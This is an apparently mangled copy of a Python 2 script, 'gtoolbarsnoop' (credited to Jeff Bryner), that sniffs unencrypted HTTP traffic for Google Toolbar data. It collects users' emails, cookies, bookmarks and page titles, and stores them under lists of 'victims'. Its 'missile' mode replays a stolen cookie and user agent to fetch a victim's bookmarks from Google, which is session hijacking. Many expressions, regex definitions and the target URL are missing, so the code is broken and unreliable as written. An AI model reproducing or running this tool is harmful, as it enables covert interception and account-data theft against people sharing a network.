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Created July 7, 2014 21:47
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Google Toolbar
#!/usr/bin/env python
#Copyright (c) 2010 Jeff Bryner
#python script to gather googletoolbar traffic and snoop on it.
#This program is free software; you can redistribute it and/or modify it under
#the terms of the GNU General Public License as published by the Free Software
#Foundation; either version 2 of the License, or (at your option) any later
#This program is distributed in the hope that it will be useful, but WITHOUT
#ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
#FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#You should have received a copy of the GNU General Public License along with
#this program; if not, write to the Free Software Foundation, Inc.,
#59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
import sys
import os
import re
import string
import fileinput
import getopt
import time
import base64
import binascii
import nids
import urllib
import urllib2
program= 'gtoolbarsnoop by jeff bryner'
def safestring(badstring):
"""makes a good strings out of a potentially bad one by escaping chars out of printable range"""
return safestringre.sub('',badstring)
faviconre=re.compile(r"""GET /favicon""",re.IGNORECASE)
tbemailre=re.compile(r"""<email data="(.*?)".*services>""",re.IGNORECASE|re.DOTALL)
#states that close a transmission and cause us to inspect it
end_states = (nids.NIDS_CLOSE, nids.NIDS_TIMEOUT, nids.NIDS_RESET, nids.NIDS_EXITING, nids.NIDS_TIMED_OUT)
victims=[] #list of folks we've found out about.
victimscookies={} #dictionary of the folks cookies
victimsuseragents={} #dictionary of the folks useragents
def handleTcpStream(tcp):
if options['debug']:
print "tcps -", str(tcp.addr), " state:", tcp.nids_state
if tcp.nids_state == nids.NIDS_JUST_EST:
# new to us, but is it one we're monitoring?
((src, sport), (dst, dport)) = tcp.addr
if dport ==80 or sport==80:
if options['debug']:
print "collecting data between: " , tcp.addr
tcp.client.collect = 1
tcp.server.collect = 1
elif tcp.nids_state == nids.NIDS_DATA:
# keep all of the stream's new data
#got anything to examine?
#two options here..wait for data or wait for end of stream. End of stream is conservative and more consistent, but lags if feed a stdin stream
#if (options['file'] <> '-' and tcp.nids_state in end_states) or
#if ( options['file']=='-' and (len(str([:tcp.server.count]).strip())>0 or tcp.nids_state in end_states)):
if tcp.nids_state in end_states:
((src, sport), (dst, dport)) = tcp.addr
if options['debug']:
print "processing stream between:", tcp.addr
sload=sload + str([:tcp.client.count]).strip()
if useragentre.findall(sload) and tbemailre.findall(sload):
#we collect emails and store stuff indexed by it whether we're asked to or not
#if we launch cookie missles later, we'll use this info
#if we're asked, we'll cough them up along the way.
if options['debug'] or options['emails']:
sys.stdout.write('gtoolbarsnoop: found an email address\n')
sys.stdout.write('Conversation: ' + str(tcp.addr) + '\n')
sys.stdout.write('clientIP: ' + str(src) + '\n')
for email in tbemailre.finditer(sload):
if options['debug'] or options['emails']:
sys.stdout.write( + '\n')
if not in victims:
for cookie in tbgooglecookiere.finditer(sload):
for useragent in useragentre.finditer(sload):
if useragentre.findall(sload) and faviconre.findall(sload) and options['icons']:
sys.stdout.write('gtoolbarsnoop: found a favicon hit\n')
sys.stdout.write('Conversation: ' + str(tcp.addr) + '\n')
sys.stdout.write('clientIP: ' + str(src) + '\n')
sys.stdout.write(str([:tcp.server.count]) + '\n')
if bookmarksre.findall(sload) and options['bookmarks']:
sys.stdout.write('gtoolbarsnoop: found bookmarks\n')
sys.stdout.write('Conversation: ' + str(tcp.addr) + '\n')
sys.stdout.write('clientIP: ' + str(src) + '\n')
sys.stdout.write(str([:tcp.client.count]) + '\n')
if titlere.findall(sload) and options['titles']:
sys.stdout.write('gtoolbarsnoop: found titles\n')
sys.stdout.write('clientIP: ' + str(src) + '\n')
for title in titlere.finditer(sload):
sys.stdout.write( + '\n')
if setgooglecookiere.findall(sload) and useragentre.findall(sload) and options['cookies']:
sys.stdout.write('gtoolbarsnoop: found set cookie\n')
sys.stdout.write('clientIP: ' + str(src) + '\n')
for cookie in setgooglecookiere.finditer(sload):
sys.stdout.write( + '\n')
if tbgooglecookiere.findall(sload) and useragentre.findall(sload) and options['cookies']:
sys.stdout.write('gtoolbarsnoop: found toolbar cookie\n')
sys.stdout.write('clientIP: ' + str(src) + '\n')
for cookie in tbgooglecookiere.finditer(sload):
sys.stdout.write( + '\n')
def missilesAway():
if len(victimscookies)>0:
for vic in victims:
sys.stdout.write('launching cookie missle against: ' + vic + '\n')
#clients1-4 return identical dns ips...
url = ''
user_agent = victimsuseragents.get(vic)
#the right way to do values..that I'm ignoring.
#values = {'name' : 'Michael Foord',
# 'location' : 'Northampton',
# 'language' : 'Python' }
headers = { 'User-Agent:' : user_agent,'Cookie:' : cookie }
#data = urllib.urlencode(values)
req = urllib2.Request(url, data, headers)
#sys.stderr.write('url:' + str(req.get_full_url()) + '\n')
#sys.stderr.write('headers:' + str(req.header_items()) + '\n')
response = urllib2.urlopen(req)
sys.stdout.write(vic + 'bookmarks: ' + str( + '\n')
def main():
global options
options = read_options()
nids.param("scan_num_hosts", 0) # disable portscan detection
#if options['file'] <> '-':
# nids.param("filename", options['file'])
# nids.param("filename",
if options['file'] and os.path.isfile(options['file']): # read a pcap file?
nids.param("filename", options['file'])
nids.param("device", options['file']) #assume network device.
# Loop forever (network device), or until EOF (pcap file)
# Note that an exception in the callback will break the loop!
except nids.error, e:
print "nids/pcap error:", e
except Exception, e:
print "misc. exception (runtime error in user callback?):", e
if options['debug']:
sys.stderr.write('Grand totals:\n')
sys.stderr.write('Victims: ' + str(victims) + '\n')
sys.stderr.write('VictimsCookies: ' + str(victimscookies) + '\n')
sys.stderr.write('VictimsUserAgents: ' + str(victimsuseragents) + '\n')
if options['missile']:
def read_options():
"""Read options from config files and the command line, returns the
defaults if no user options are found"""
# required options
required = ['file']
# defaults
options = {'file' : '',
'debug' : False,
'verbose': False,
'icons': False,
'bookmarks': False,
'titles': False,
'emails': False,
'cookies': False,
'missile': False
# read from command line
helpstr = 'Usage: ' + sys.argv[0] + ' [OPTIONS]' + """\n
-f, --file <filename> the pcap input file or network device name (eth0/wlan0/tap0) to use
-b, --bookmarks show bookmarks found
-c, --cookies show cookies found
-i, --icons show favicon hits
-t, --titles show bookmark/page titles found
-e, --emails show email addresses found
-m, --missile fsck waiting around for passive hits, send a cookie missile
and force google to give up a users bookmarks.
-a, --all show all bookmarks, favicon hits,cookies and titles *and* launch cookie missle
-d, --debug run in debug mode with crazy output
-h, --help
-v, --verbose show some internal details
-V, --version show version info\n
A '*' means this option is required and has to be set."""
optlist, args = getopt.getopt(sys.argv[1:], 'f:inbcetamhVv', ['file=', 'help', 'version', 'verbose' ,'debug','bookmarks','cookies','icons','titles','all','missile','emails'])
# parse options
for o, a in optlist:
if (o == '-h' or o == '--help'):
print helpstr
elif (o == '-V' or o == '--version'):
print program, version
elif (o == '-v' or o == '--verbose'):
options['verbose'] = True
elif (o == '-d' or o == '--debug'):
options['debug'] = True
elif (o =='-i' or o == '--icons'):
options['icons'] = True
elif (o =='-b' or o == '--bookmarks'):
options['bookmarks'] = True
elif (o =='-c' or o == '--cookies'):
options['cookies'] = True
elif (o =='-t' or o == '--titles'):
options['titles'] = True
elif (o =='-e' or o == '--emails'):
options['emails'] = True
elif (o =='-m' or o == '--missile'):
options['missile'] = True
elif (o =='-a' or o == '--all'):
options['icons'] = True
options['bookmarks'] = True
options['titles'] = True
options['cookies']= True
options['emails']= True
options['missile']= True
for option in options.keys():
execcode = "if (o == '-%s' or o == '--%s'): options['%s'] = a" % (option[0], option, option)
exec execcode
for option in required:
if not options[option]:
print "Required option '%s' is not set! (add a --help option for help)" % option
if ( options['file']=='-' and options['debug'] ):
sys.stderr.write('reading from stdin\n')
if options['verbose']:
sys.stderr.write("options: " + str(options) + '\n')
# return all options
return options
if __name__ == '__main__':
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